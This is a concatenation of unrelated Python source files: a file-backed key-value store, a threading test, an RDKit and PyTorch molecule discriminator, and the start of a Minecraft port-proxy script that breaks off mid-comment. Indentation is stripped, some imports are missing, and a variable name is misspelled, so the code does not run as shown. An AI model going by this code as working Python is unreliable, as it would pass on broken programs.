import shutil
import time
from typing import Any, Dict, List, Tuple
import copy
import numpy as np
import PIL.Image
import simplejson as json
from os.path import isfile, join
import threading
from multiprocessing import Process
# from multiprocessing import SimpleQueue as Queue
from multiprocessing import Queue
# from queue import SimpleQueue as Queue
SUPPORTED_FILE_TYPES = ['png', 'jpg', 'pkl', 'json', 'csv']
class JSONEncoderDefault(json.JSONEncoder):
def default(self, obj): # pylint: disable=E0202
if isinstance(obj, np.integer):
return int(obj)
elif isinstance(obj, np.floating):
return float(obj)
elif isinstance(obj, np.ndarray):
if obj.size > 1000:
return "REDACTED: NUMPY OBJ OF SIZE {} TOO LARGE".format(obj.size)
else:
return obj.tolist()
else:
try:
return super(JSONEncoderDefault, self).default(obj)
except Exception as e:
return "ENCODE_FAILED:{}_AS_STR:{}".format(type(obj),obj)
class JSONDecoderDefault(json.JSONDecoder):
def __init__(self, *args, **kwargs):
json.JSONDecoder.__init__(
self, object_hook=self.object_hook, *args, **kwargs)
def object_hook(self, obj): # pylint: disable=E0202
return obj
def format_key(key):
if type(key) is str:
return (key,)
else:
return tuple([str(k) for k in key])
def get_filetype(filepath_prefix):
for ft in SUPPORTED_FILE_TYPES:
if os.path.exists(filepath_prefix + "." + ft):
return ft
return None
def path_to_key_name_stype(root_path, full_file_path, sep="/"):
if not root_path.endswith(sep):
root_path = root_path + sep
if len(root_path)>1:
full_file_path = full_file_path.replace(root_path,"",1)
if full_file_path.startswith(sep):
full_file_path=full_file_path[1:]
fpath, stype = os.path.splitext(full_file_path)
path_parts = fpath.split(sep)
name = path_parts[-1]
path_parts = path_parts[:-1]
key = format_key(path_parts)
return key, name, stype[1:]
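# A hedged sketch of the helpers above (the root path and file path are made up):
#   format_key("users")                                   -> ("users",)
#   format_key(("users", 42))                             -> ("users", "42")
#   path_to_key_name_stype("db", "db/users/42/data.json") -> (("users", "42"), "data", "json")
def _example_key_helpers():
    key = format_key(("users", 42))
    parsed = path_to_key_name_stype("db", "db/users/42/data.json")
    return key, parsed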
class DeadSimpleDB:
def __init__(self,
root_path=None,
overwrite=False,
json_encoder=JSONEncoderDefault,
json_decoder=JSONDecoderDefault,
read_only=False,
use_write_thread=True,
check_file_last_updated = True): ## this is a write optimization
self.json_encoder = json_encoder
self.json_decoder = json_decoder
if root_path is None:
root_path = "deadsimpledb"
self.root_path = root_path
if overwrite:
logging.info("Overwrite enabled...")
if os.path.exists(self.root_path):
logging.info(
".... Removing directory {}".format(self.root_path))
shutil.rmtree(self.root_path)
else:
logging.info("No folder exists, not overwriting")
if not os.path.exists(self.root_path):
os.makedirs(self.root_path)
self.read_only = read_only
self.running = True
if self.read_only:
self.use_write_thread = False
self.check_file_last_updated = check_file_last_updated
self.data_store: Dict[str, Dict[str, Any]] = {}
self.cache: Dict[str, Dict[str, Any]] = {}
self.use_write_thread = use_write_thread
if self.use_write_thread:
self.write_queue= Queue()
self.writer_thread = threading.Thread(target=self._process_write_requests, args=())
self.writer_thread.daemon = True
self.writer_thread.start()
else:
print("Not using write thread")
def _process_write_requests(self):
print("Write Thread initialized")
running = True
t = threading.currentThread()
while running:
try:
key,name,value,stype = self.write_queue.get(timeout=3)
try:
self._write(key,value,name,stype)
except Exception as e:
print("Exception while writing for root_path:{}, key:{}, name: {} --- {}".format(self.root_path,key,name,e))
except Exception as e:
pass
running = getattr(t, "running", True)
if not running and not self.write_queue.empty():
running = True
def check_path(self, path):
if not os.path.exists(path):
os.makedirs(path, exist_ok=True)
def update_dict(self, key, value, name='data', stype="json", clear_cache=False):
key = format_key(key)
value_dict = self.get(key, name, stype=stype)
if value_dict is None:
value_dict = {}
value_dict.update(value)
self.save(key, name=name, value=value_dict, stype=stype, clear_cache=clear_cache)
else:
value_dict.update(value)
self._flush(key, name, clear_cache)
def remove_items_from_dict(self, key, items, name='data', stype="json", clear_cache=False):
key = format_key(key)
value_dict = self.get(key, name, stype=stype)
if value_dict is None:
return
for item in items:
value_dict.pop(item, None)
self._flush(key, name, clear_cache)
def append_to_list(self, key, value, name='data', stype="json", clear_cache=False):
key = format_key(key)
value_list = self.get(key, name, stype=stype)
if value_list is None:
value_list = []
value_list.append(value)
self.save(key, name=name, value=value_list, stype=stype, clear_cache=clear_cache)
else:
value_list.append(value)
self._flush(key, name, clear_cache)
def get_multipart_list(self,
key,
name="data",
start_idx = 0,
end_idx = None):
manifest_name = "{}__{}".format(name, "manifest")
manifest = self.get(key = key, name = manifest_name)
if manifest is None:
return None
start_idx = start_idx
end_idx = end_idx if end_idx else manifest['parts_index'] +1
value_list = []
for i in range(start_idx,end_idx):
part_name = "{}__part{}".format(name, i)
value_list_part = self.get(key=key, name=part_name,stype='json')
if value_list_part is not None:
value_list.extend(value_list_part)
else:
print("no data found1")
return value_list
def append_to_multipart_list(self,
key,
value: Any,
name="data"):
if type(value) is np.ndarray:
value = np.asscalar(value)
manifest_name = "{}__{}".format(name, "manifest")
manifest = self.get(key, manifest_name, stype="json")
if manifest is None:
manifest = {}
manifest['chunksize'] = 500
manifest['parts_index'] = 0
self.save(key=key, name=manifest_name, value=manifest)
part_name = "{}__part{}".format(name, manifest['parts_index'])
value_list = self.get(key=key, name=part_name)
if value_list is None:
value_list = []
self.save(key, name=part_name, value=value_list, stype='json')
value_list.append(value)
is_full = len(value_list) >= manifest['chunksize']
self.save(key, name=part_name, value=value_list, stype='json')
if is_full:
manifest['parts_index'] += 1
new_part_name = "{}__part{}".format(name, manifest['parts_index'])
self.save(key=key, name=new_part_name, value=[], stype='json')
self.save(key=key, name=manifest_name, value=manifest)
def save(self, key, value, name='data', stype="json", clear_cache=False, last_updated=None, flush=True):
key = format_key(key)
items = self.data_store.get(key, None)
if items is None:
items = {}
self.data_store[key] = items
items[name] = {
'key': key,
'value': value,
'name': name,
'last_updated': last_updated, # file updated
'stype': stype}
if flush:
self._flush(key, name, clear_cache)
def list(self,key, use_cache=False):
#TODO: add list cache
key = format_key(key)
names = []
subkeys = []
path = self._get_path_from_key(key)
for fname in os.listdir(path):
if isfile(os.path.join(path, fname)):
name = os.path.splitext(fname)[0]
stype = os.path.splitext(fname)[1]
if name.endswith("_tmp"):
continue
names.append(name)
else:
subkeys.append(fname)
return names, subkeys
def list_keys_stream(self,key, use_cache=False):
#TODO: add list cache
key = format_key(key)
path = self._get_path_from_key(key)
for fname in os.listdir(path):
if not isfile(os.path.join(path, fname)):
yield fname
def list_objects_with_name_stream(self,key,name):
key = format_key(key)
for col in self.list_keys_stream(key):
fullkey = key + (col,)
obj = self.get(fullkey,name)
if obj is not None:
yield (col,obj)
def list_objects_with_name(self,key,name):
key = format_key(key)
names, subkeys = self.list(key)
print("Done listing")
objects = []
for col in subkeys:
fullkey = key + (col,)
obj = self.get(fullkey,name)
if obj is not None:
objects.append((col,obj))
return objects
def list_objects(self,key):
key = format_key(key)
names, subkeys = self.list(key)
objects = []
for name in names:
obj = self.get(key,name)
if obj is not None:
objects.append((name,obj))
return objects
def get(self, key, name="data", stype=None, refresh=False):
key = format_key(key)
items = self.data_store.get(key, None)
if self.check_file_last_updated:
file_last_updated = self._file_last_updated( key, name=name, stype=stype)
else:
file_last_updated = None
if not refresh and items is not None and name in items:
entry = items.get(name)
cached_last_updated = entry.get('last_updated',None)
# Return data from cache if ...
if file_last_updated is None or cached_last_updated is None or file_last_updated <= cached_last_updated:
data = entry.get('value')
if data is not None:
return data
# read data from file
data, stype = self._read(key, name, stype)
if data is None:
return None
self.save(key, data,
name=name,
stype=stype,
last_updated=file_last_updated,
flush=False)
return data
def delete(self, key, name="data", stype=None):
#TODO Fix slow deletes
key = format_key(key)
self.flush_all()
items = self.data_store.get(key)
path = self._get_path_from_key(key)
#Remove file from disk
if name is not None:
items.pop(name,None)
filepath_prefix = os.path.join(path, "{}".format(name))
if stype is None:
stype = get_filetype(filepath_prefix)
#raise Exception("Not found")
if stype is not None:
filepath = os.path.join(path, "{}.{}".format(name, stype.lower()))
if os.path.isfile(filepath):
os.remove(filepath)
#Remove path
if items is None or len(items) == 0:
# Remove Path From memory
self.data_store.pop(key,None)
# If path is empty
if len(os.listdir(path)) == 0:
try:
if not os.path.isfile(path):
os.rmdir(path=os.path.join(os.getcwd(),path))
except Exception as e:
print(e)
if len(key) > 1:
self.delete(key[:-1],name=None)
def prepvalue(self,value):
return value
def _flush(self, key, name='data', clear_cache=False):
if self.read_only:
return "not flushing {} {}".format(key,name)
elif self.use_write_thread:
# self._write_to_q((key,name,clear_cache))
if self.read_only:
return
items = self.data_store[key]
entry = items.get(name)
if entry is not None:
value = entry['value']
if clear_cache:
entry['value'] = None
# self._write(key, name=name, value=value, stype=entry['stype'])
self.write_queue.put((key,name,self.prepvalue(value),entry['stype']))
else:
self._flush_sync(key,name,clear_cache)
def delayed_write(self,key,name,value,stype):
if self.use_write_thread:
self.write_queue.put((key,name,self.prepvalue(value),stype))
else:
raise Exception("Delayed write not supported with use_write_thread=False")
def delayed_write_by_path(self,value,path):
key,name,stype = path_to_key_name_stype(self.root_path, path)
self.delayed_write(key,name,value,stype)
def _flush_sync(self, key, name='data', clear_cache=False):
if self.read_only:
return
items = self.data_store[key]
entry = items.get(name)
if entry is not None:
value = entry['value']
if clear_cache:
entry['value'] = None
self._write(key, name=name, value=value, stype=entry['stype'])
async def _flush_async(self, key, name='data', clear_cache=False):
if self.read_only:
return
items = self.data_store[key]
entry = items.get(name)
if entry is not None:
value = entry['value']
if clear_cache:
entry['value'] = None
self._write(key, name=name, value=value, stype=entry['stype'])
def _get_path_from_key(self, key):
if type(key) is tuple:
path_parts = [str(k) for k in [self.root_path] + list(key)]
else:
path_parts = [str(k) for k in [self.root_path] + [key]]
path = os.path.join(*path_parts)
self.check_path(path)
return path
def close(self):
if self.read_only:
return
if self.use_write_thread:
self.writer_thread.running = False
self.writer_thread.join()
else:
return
def flush_all(self):
if self.read_only:
return
if self.use_write_thread:
flushed = False
while not flushed:
if self.write_queue.qsize() == 0:
return
self.writer_thread.join()
else:
return
def _write(self, key, value, name='data', stype="json"):
"""
Saves value to file.
TODO: add auto-handling of file type
"""
if self.read_only:
return
path = self._get_path_from_key(key)
filepath = os.path.join(path, "{}.{}".format(name, stype.lower()))
filepath_tmp = os.path.join(
path, "{}_tmp.{}".format(name, stype.lower()))
try:
if stype == "json":
with open(filepath_tmp, 'w') as f:
json.dump(value, f, ignore_nan=True, cls=self.json_encoder)
elif stype == "pkl":
with open(filepath_tmp, 'wb') as f:
pickle.dump(value, f)
elif stype == "png" or stype == "jpg":
if type(value) == np.ndarray:
im = PIL.Image.fromarray(value)
else:
im = value
im.save(filepath_tmp)
elif stype == "csv":
with open(filepath_tmp, 'w') as f:
writer = csv.writer(f, delimiter='\t',
quotechar='|',
quoting=csv.QUOTE_MINIMAL)
writer.writerows(value)
else:
with open(filepath_tmp, 'w') as f:
f.write(value)
shutil.copyfile(filepath_tmp, filepath)
os.remove(filepath_tmp)
except Exception as e:
print("Error key:{} name:{} type:{}".format(key,name,type(value)))
print("\t{}".format(value))
raise e
def _file_last_updated(self, key, name="data", stype=None):
path = self._get_path_from_key(key)
filepath_prefix = os.path.join(path, "{}".format(name))
if stype is None:
stype = get_filetype(filepath_prefix)
if stype is None:
return None
filepath = filepath_prefix + "." + stype.lower()
if os.path.isfile(filepath):
return os.path.getmtime(filepath)
else:
return None
def _read(self, key, name="data", stype=None, default_value=None):
path = self._get_path_from_key(key)
filepath_prefix = os.path.join(path, "{}".format(name))
if stype is None:
stype = get_filetype(filepath_prefix)
if stype is None:
return None, None
filepath = filepath_prefix + "." + stype.lower()
try:
if not os.path.isfile(filepath):
return default_value, stype
if stype.lower() == "json":
with open(filepath, 'r') as f:
value = json.load(f, cls=self.json_decoder)
elif stype == "pkl":
with open(filepath, 'rb') as f:
value = pickle.load(f)
elif stype == "csv":
value = []
with open(filepath, 'r') as f:
reader = csv.reader(f, delimiter='\t', quotechar='|')
for line in reader:
value.append(line)
else:
raise Exception("Unsupported format {}".format(stype))
except Exception as e:
print("Error reading key:{}, name:{}, stype:{}".format(key,name,stype))
print("Exception = {}".format(e))
return None,None
return value, stype
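# A hedged usage sketch of DeadSimpleDB (the root path, keys and values are
# made up; use_write_thread=False keeps the writes synchronous for clarity).
def _example_deadsimpledb():
    db = DeadSimpleDB("example_db", use_write_thread=False)
    db.save(("users", "42"), {"name": "Ada"}, name="profile", stype="json")
    db.append_to_list(("users", "42"), {"event": "login"}, name="history")
    profile = db.get(("users", "42"), name="profile")
    names, subkeys = db.list(("users",))
    db.close()
    return profile, names, subkeys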
|
PointTest.py
|
# test point
import src.Point as Point
from threading import Thread
def prod(point):
for i in range(9):
point.set(i, i)
def cons(point):
for i in range(9):
print(point.get())
test_point = Point.Point()
pro = Thread(target=prod, args=[test_point])
con = Thread(target=cons, args=[test_point])
pro.start()
con.start()
|
NN.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Jul 31 19:25:08 2021
@author: akshat
"""
import os
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import rdkit
from rdkit import Chem
from rdkit import RDLogger
from rdkit.Chem import Descriptors
RDLogger.DisableLog('rdApp.*')
import pickle
import inspect
from collections import OrderedDict
import multiprocessing
manager = multiprocessing.Manager()
lock = multiprocessing.Lock()
def get_rot_bonds_posn(mol):
'''Return atom indices with Rotatable bonds
Examples:
>>> get_rot_bonds_posn(Chem.MolFromSmiles('CC1=CC=CC=C1')) # Toluene (rotatable bond: CH3-ring)
((0, 1),)
>>> get_rot_bonds_posn(Chem.MolFromSmiles('CCC1=CC=CC=C1')) # Ethylbenzene (rotatable bonds: CH3-CH2, CH2-ring)
((0, 1), (1, 2))
'''
RotatableBond = Chem.MolFromSmarts('*-&!@*')
rot = mol.GetSubstructMatches(RotatableBond)
return rot
def get_bond_indeces(mol, rot):
'''Get the indices of all bonds between the rotatable-bond atom pairs (generated from 'get_rot_bonds_posn')
'''
bonds_idx = []
for i in range(len(rot)):
bond = mol.GetBondBetweenAtoms(rot[i][0],rot[i][1])
bonds_idx.append(bond.GetIdx())
return bonds_idx
def obtain_rings(smi):
'''Obtain a list of all rings present in SMILES string smi
Examples:
>>> obtain_rings('CCC1=CC=CC=C1')
['c1ccccc1']
>>> obtain_rings('C1=CC=C(C=C1)C1=CC=CC=C1')
['c1ccccc1', 'c1ccccc1']
>>> obtain_rings('C1=CC2=C(C=C1)C=CC=C2')
(None, None)
Parameters:
smi (string) : SMILES string of a molecule
Returns
(list) : List of all rings in a SMILES string
'''
mol = Chem.MolFromSmiles(smi)
rot = get_rot_bonds_posn(mol) # Get rotatable bond positions
if len(rot) == 0:
return None, None
bond_idx = get_bond_indeces(mol, rot)
new_mol = Chem.FragmentOnBonds(mol, bond_idx, addDummies=False)
new_smile = Chem.MolToSmiles(new_mol)
smile_split_list = new_smile.split(".")
rings = []
for item in smile_split_list:
if '1' in item:
rings.append(item)
return rings
def count_atoms(mol, atomic_num):
'''Count the number of atoms in mol with atomic number atomic_num
Parameters:
mol (rdkit.Chem.rdchem.Mol) : Molecule in which search is conducted
atomic_num (int) : Counting is done in mol for atoms with this atomic number
Returns:
(int) : final count of atoms
'''
pat = Chem.MolFromSmarts("[#{}]".format(atomic_num))
return len(mol.GetSubstructMatches(pat))
def get_num_bond_types(mol):
'''Calculate the ratio of total number of (single, double, triple, aromatic) bonds to the
total number of bonds.
Parameters:
mol (rdkit.Chem.rdchem.Mol) : Molecule for which ratios are returned
Returns:
(list): [num_single/num_bonds, num_double/num_bonds, num_triple/num_bonds, num_aromatic/num_bonds]
'''
bonds = mol.GetBonds()
num_bonds = 0
num_double = 0
num_triple = 0
num_single = 0
num_aromatic = 0
for b in bonds:
num_bonds += 1
if b.GetBondType() == rdkit.Chem.rdchem.BondType.SINGLE:
num_single += 1
if b.GetBondType() == rdkit.Chem.rdchem.BondType.DOUBLE:
num_double += 1
if b.GetBondType() == rdkit.Chem.rdchem.BondType.TRIPLE:
num_triple += 1
if b.GetBondType() == rdkit.Chem.rdchem.BondType.AROMATIC:
num_aromatic += 1
if num_bonds == 0:
return [0, 0, 0, 0]
else:
return [num_single/num_bonds, num_double/num_bonds, num_triple/num_bonds, num_aromatic/num_bonds]
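# A hedged worked example for the ratios above: ethene ('C=C', hydrogens
# implicit) has a single bond object, a double bond, so the expected result is
# [0.0, 1.0, 0.0, 0.0]; benzene ('c1ccccc1') has six aromatic bonds, giving
# [0.0, 0.0, 0.0, 1.0].
def _example_bond_type_ratios():
    return (get_num_bond_types(Chem.MolFromSmiles('C=C')),
            get_num_bond_types(Chem.MolFromSmiles('c1ccccc1')))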
def count_conseq_double(mol):
'''Return the number of consecutive double bonds in an entire molecule
including rings
Examples
>>> count_conseq_double(Chem.MolFromSmiles('C1=CC=C=C=C1'))
2
>>> count_conseq_double(Chem.MolFromSmiles('C1=CC=CC=C1'))
0
>>> count_conseq_double(Chem.MolFromSmiles('C1=CC2=C(C=C1)C=C=C=C2'))
2
Parameters:
mol (rdkit.Chem.rdchem.Mol) : Molecule for which consecutive double bonds are to be counted
Returns:
(int): The integer number of consecutive double bonds
'''
bonds = mol.GetBonds()
previous_BType = None
count_conseq_doub = 0
for b in bonds:
curr_BType = b.GetBondType()
if previous_BType == curr_BType and curr_BType == rdkit.Chem.rdchem.BondType.DOUBLE:
count_conseq_doub += 1
previous_BType = curr_BType
return count_conseq_doub
def size_ring_counter(ring_ls):
'''Get the number of rings of sizes 3 to 20 and the number of consecutive double bonds in rings
Parameters:
ring_ls (list) : list of rings of a molecule
Returns
(list) : Of size 19 (1 entry for the number of consecutive double bonds,
18 entries for the number of rings of sizes 3 to 20)
'''
ring_counter = []
if ring_ls == (None, None): # No rings present, return 0s for all 19 features
return [0 for i in range(19)]
mol_ring_ls = [Chem.MolFromSmiles(smi) for smi in ring_ls]
# Count the number of consecutive double bonds in rings
conseq_dbl_bnd_in_ring = 0
for item in mol_ring_ls:
conseq_dbl_bnd_in_ring += count_conseq_double(item)
ring_counter.append(conseq_dbl_bnd_in_ring) # append onto list ring_counter
# Count the number of rings of each size from 3 to 20
for i in range(3, 21):
count = 0
for mol_ring in mol_ring_ls:
if mol_ring.GetNumAtoms() == i:
count += 1
ring_counter.append(count)
return ring_counter
def get_mol_info(smi):
''' Calculate a set of 51 RDKit properties, collected from the above helper functions.
Parameters:
smi (string) : SMILES string of molecule
Returns:
(list of float) : list of 51 calculated properties
'''
mol = Chem.MolFromSmiles(smi)
num_atoms = mol.GetNumAtoms()
num_hydro = Chem.AddHs(mol).GetNumAtoms() - num_atoms
num_carbon = count_atoms(mol, 6)
num_nitro = count_atoms(mol, 7)
num_sulphur = count_atoms(mol, 16)
num_oxy = count_atoms(mol, 8)
num_clorine = count_atoms(mol, 17)
num_bromine = count_atoms(mol, 35)
num_florine = count_atoms(mol, 9)
if num_carbon == 0: # Avoid division by zero error, set num_carbon to a very small value
num_carbon = 0.0001
basic_props = [num_atoms/num_carbon, num_hydro/num_carbon, num_nitro/num_carbon,
num_sulphur/num_carbon, num_oxy/num_carbon, num_clorine/num_carbon,
num_bromine/num_carbon, num_florine/num_carbon]
to_caculate = ["RingCount", "HallKierAlpha", "BalabanJ", "NumAliphaticCarbocycles","NumAliphaticHeterocycles",
"NumAliphaticRings","NumAromaticCarbocycles","NumAromaticHeterocycles",
"NumAromaticRings","NumHAcceptors","NumHDonors","NumHeteroatoms",
"NumRadicalElectrons","NumSaturatedCarbocycles","NumSaturatedHeterocycles",
"NumSaturatedRings","NumValenceElectrons"]
# Calculate all properties listed in 'to_caculate'
calc_props = OrderedDict(inspect.getmembers(Descriptors, inspect.isfunction))
for key in list(calc_props.keys()):
if key.startswith('_'):
del calc_props[key]
continue
if len(to_caculate)!=0 and key not in to_caculate:
del calc_props[key]
features = [val(mol) for key,val in calc_props.items()] # List of properties
# Ratio of total number of (single, double, triple, aromatic) bonds to the total number of bonds.
simple_bond_info = get_num_bond_types(mol)
# Obtain all rings in a molecule and calc. #of triple bonds in rings & #of rings in molecule
ring_ls = obtain_rings(smi)
num_triple = 0 # num triple bonds in ring
if len(ring_ls) > 0 and ring_ls != (None, None):
for item in ring_ls:
num_triple += item.count('#')
simple_bond_info.append(len(ring_ls)) # append number of Rings in molecule
else: simple_bond_info.append(0) # no rings (no rotatable bonds)
simple_bond_info.append(num_triple) # number of triple bonds in rings
# Calculate the number of rings of size 3 to 20 & number of conseq. double bonds in rings
simple_bond_info = simple_bond_info + size_ring_counter(ring_ls)
# Calculate the number of consecutive double bonds in the entire molecule
simple_bond_info.append(count_conseq_double(mol))
return np.array(features + basic_props + simple_bond_info)
def get_mult_mol_info_parr(smiles_list, dataset_x):
''' Record calculated RDKit property results for each SMILES in smiles_list,
and record the result in dictionary dataset_x.
'''
for smi in smiles_list:
dataset_x['properties_rdkit'][smi] = get_mol_info(smi)
def get_chunks(arr, num_processors, ratio):
"""
Split a list into num_processors chunks of roughly ratio elements each
"""
chunks = [] # Collect arrays that will be sent to different processors
counter = int(ratio)
for i in range(num_processors):
if i == 0:
chunks.append(arr[0:counter])
if i != 0 and i<num_processors-1:
chunks.append(arr[counter-int(ratio): counter])
if i == num_processors-1:
chunks.append(arr[counter-int(ratio): ])
counter += int(ratio)
return chunks
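# A hedged example of the chunking above: six placeholder SMILES split across
# three processes with ratio = len(arr) / num_processors = 2 yields
# [['a', 'b'], ['c', 'd'], ['e', 'f']].
def _example_get_chunks():
    arr = ['a', 'b', 'c', 'd', 'e', 'f']
    return get_chunks(arr, num_processors=3, ratio=len(arr) / 3)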
def create_parr_process(chunks):
'''This function initiates parallel execution (based on the number of cpu cores)
to calculate all the properties mentioned in 'get_mol_info()'
Parameters:
chunks (list) : List of lists, containing SMILES strings. Each sub-list is
sent to a different process.
(Locked manager dictionaries are created internally for recording results;
locking allows communication between different processes.)
Returns:
(dict) : Combined dictionary mapping each SMILES string to its property vector
'''
# Assign data to each process
process_collector = []
collect_dictionaries = []
# manager = multiprocessing.Manager()
# lock = multiprocessing.Lock()
for chunk in chunks: # process initialization
dataset_x = manager.dict(lock=True)
smiles_map_props = manager.dict(lock=True)
dataset_x['properties_rdkit'] = smiles_map_props
collect_dictionaries.append(dataset_x)
process_collector.append(multiprocessing.Process(target=get_mult_mol_info_parr, args=(chunk, dataset_x, )))
for item in process_collector: # initiate all processes
item.start()
for item in process_collector: # wait for all processes to finish
item.join()
combined_dict = {}
for i,item in enumerate(collect_dictionaries):
combined_dict.update(item['properties_rdkit'])
return combined_dict
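# A hedged sketch tying the two helpers together: chunk a (made-up) SMILES list
# and compute the 51-property vectors in parallel; the result maps each SMILES
# string to its property array.
def _example_parallel_properties():
    smiles = ['CCO', 'c1ccccc1', 'CC(=O)O', 'CCN']
    chunks = get_chunks(smiles, num_processors=2, ratio=len(smiles) / 2)
    return create_parr_process(chunks)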
def obtain_discr_encoding(molecules_here, num_processors):
dataset_x = []
for smi in molecules_here:
dataset_x.append(get_mol_info(smi))
return np.array(dataset_x)
class Net(torch.nn.Module):
def __init__(self, n_feature, h_sizes, n_output):
super(Net, self).__init__()
# Layers
self.hidden = nn.ModuleList()
for k in range(len(h_sizes)-1):
self.hidden.append(nn.Linear(h_sizes[k], h_sizes[k+1]))
self.predict = torch.nn.Linear(h_sizes[-1], n_output)
def forward(self, x):
for layer in self.hidden:
x = torch.sigmoid(layer(x))
output = F.sigmoid(self.predict(x))
return output
def create_discriminator(init_len, n_hidden, device):
"""
Define an instance of the discriminator
"""
n_hidden.insert(0, init_len)
net = Net(n_feature=init_len, h_sizes=n_hidden, n_output=1).to(device)
optimizer = torch.optim.Adam(net.parameters(), lr=0.001, weight_decay=1e-4)
loss_func = torch.nn.BCELoss()
return (net, optimizer, loss_func)
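# A hedged sketch: building the discriminator above for the 51 RDKit features
# and running a forward pass on random inputs (batch size and hidden sizes are
# arbitrary illustrative choices).
def _example_discriminator_forward():
    net, optimizer, loss_func = create_discriminator(init_len=51, n_hidden=[100, 10], device='cpu')
    scores = net(torch.randn(4, 51))  # shape (4, 1), values in (0, 1)
    return scores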
def obtain_initial_discriminator(disc_layers, device):
''' Obtain Discriminator initializer
(the number of input features is fixed to the 51 RDKit properties above)
Parameters:
disc_layers (list) : Intermediate discrm. layers (e.g. [100, 10])
device (str) : Device the discrm. will be initialized on
Returns:
discriminator : torch model
d_optimizer : Optimizer (Adam)
d_loss_func : Loss function (binary cross-entropy)
'''
# Discriminator initialization
discriminator, d_optimizer, d_loss_func = create_discriminator(51, disc_layers, device)
return discriminator, d_optimizer, d_loss_func
def do_x_training_steps(data_x, data_y, net, optimizer, loss_func, steps, graph_x_counter, device):
data_x = torch.tensor(data_x.astype(np.float32), device=device)
data_y = torch.tensor(data_y, device=device, dtype=torch.float)
net.train()
for t in range(steps):
predictions = net(data_x)
loss = loss_func(predictions, data_y.reshape(len(data_y), 1))
if t % 400 == 0:
print(' Epoch:{} Loss:{}'.format(t, loss.item()))
optimizer.zero_grad()
loss.backward(retain_graph=True)
optimizer.step()
return net
def save_model(model, generation_index, dir_name):
out_dir = './{}/{}'.format(dir_name, generation_index)
if not os.path.isdir(out_dir):
os.system('mkdir {}'.format(out_dir))
torch.save(model, out_dir+'/model')
def load_saved_model(generation_index):
# model = torch.load('./RESULTS/{}/model'.format(generation_index))
# model = model.eval()
# return model
#
model = pickle.load(open('sarsmodel.pkl', 'rb'))
model = model.model
return model
def do_predictions(discriminator, data_x, device):
discriminator = discriminator.eval()
data_x = torch.tensor(data_x.astype(np.float32), device=device)
outputs = discriminator(data_x)
predictions = outputs.detach().cpu().numpy() # Return as a numpy array
return (predictions)
def train_and_save_model(smiles_ls, pro_val, generation_index):
dataset_x = obtain_discr_encoding(smiles_ls, num_processors=1) # multiprocessing.cpu_count()
avg_val = np.percentile(pro_val, 80) # np.average(pro_val)
dataset_y = np.array([1 if x>=avg_val else 0 for x in pro_val ])
disc_layers = [100, 10]
device = 'cpu'
discriminator, d_optimizer, d_loss_func = obtain_initial_discriminator(disc_layers, device)
discriminator = do_x_training_steps(data_x=dataset_x, data_y=dataset_y, net=discriminator, optimizer=d_optimizer, loss_func=d_loss_func, steps=2000, graph_x_counter=1, device=device)
# Save discriminator after training
save_model(discriminator, generation_index=generation_index, dir_name='RESULTS')
def obtain_new_pred(smiles_ls, generation_index):
predictions = []
model = load_saved_model(generation_index=generation_index)
for i,smi in enumerate(smiles_ls):
if i % 10000 == 0:
print(' Predicting: {}/{}'.format(i, len(smiles_ls)))
# data_x = obtain_discr_encoding([smi], 1)
# data_x = torch.tensor(data_x.astype(np.float32), device='cpu')
# outputs = model(data_x)
# out_ = outputs.detach().cpu().numpy()
# predictions.append(float(out_[0]))
data_x = obtain_discr_encoding([smi], 1)
data_x = torch.tensor(data_x.astype(np.float32), device='cpu')
# outputs = model(data_x)
outputs = model.predict(data_x)
out_ = outputs #.detach().cpu().numpy()
predictions.append(float(out_[0]))
return predictions
|
mineportproxy.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
###################################################
#........../\./\...___......|\.|..../...\.........#
#........./..|..\/\.|.|_|._.|.\|....|.c.|.........#
#......../....../--\|.|.|.|i|..|....\.../.........#
# Mathtin (c) #
###################################################
# Author: Daniel [Mathtin] Shiko #
# Copyright (c) 2020 <wdaniil@mail.ru> #
# This file is released under the MIT license. #
###################################################
__author__ = 'Mathtin'
import subprocess
import platform
import logging
import logging.config
import os
import sys
import re
import time
import threading
import psutil
import argparse
# Determine which OS we are running on
PLATFROM = platform.system()
# Include netcat instances as game instances (for testing purposes)
# Switched via args
INCLUDE_NETCAT = False
# Basic separate log config (level switched via args)
LOGGING_CONFIG = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'standard': {
'format': '%(asctime)s [%(levelname)s] %(name)s: %(message)s'
},
},
'handlers': {
'default': {
'level': 'INFO',
'formatter': 'standard',
'class': 'logging.StreamHandler',
'stream': 'ext://sys.stderr',
},
},
'loggers': {
'mineportproxy': {
'handlers': ['default'],
'level': 'INFO'
},
}
}
# module logger (setup in main)
log = None
#############
## UTILITY ##
#############
def binary_exists(program):
''' Check if binary file exists (by full path or in PATH env variable)
Parameters:
program (str): binary file name (or full path name)
Returns:
bool: True if binary exists
'''
def is_exe(fpath):
return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
fpath, _ = os.path.split(program)
if fpath:
if is_exe(program):
return True
else:
for path in os.environ['PATH'].split(os.pathsep):
exe_file = os.path.join(path, program)
if is_exe(exe_file):
return True
return False
def shell(cmd, timeout=1):
''' Evaluates command and returns piped stdout and stderr. Note: returns (None, None) on timeout
Parameters:
cmd (str): shell command to evaluate
timeout (float): communicate timeout in seconds (default: 1 sec)
Returns:
        (bytes, bytes): stdout and stderr output of command
'''
#log.debug('Executing: %s' % cmd)
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
try:
return proc.communicate(timeout=timeout)
except subprocess.TimeoutExpired:
proc.kill()
return None, None
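# A quick sketch of the shell() contract used throughout this script: both
# streams come back as bytes, and (None, None) signals that the command timed
# out and was killed. The echo command here is only an illustration.
def _example_shell_contract():
    out, err = shell('echo hello')
    if out is None and err is None:
        return 'timed out'
    return out.decode('utf-8', errors='replace').strip()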
platform_specific_lib = {}
def platform_specific(pl):
''' Parametric decorator adding function only on specified OS name
Parameters:
pl (str): OS name
Returns:
decorator: actual decorator to gather function
'''
def wrapper(func):
name = func.__name__
        if pl == PLATFORM:
platform_specific_lib[name] = func
elif name not in platform_specific_lib:
def unimplemented(*args, **kwargs):
                raise Exception('%s is not implemented for the current platform' % name)
platform_specific_lib[name] = unimplemented
return func
return wrapper
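# A minimal sketch (hypothetical function name) of how the parametric decorator
# above is meant to be used: decorate one variant per OS under the same name, and
# only the variant matching PLATFORM is kept in platform_specific_lib; on any
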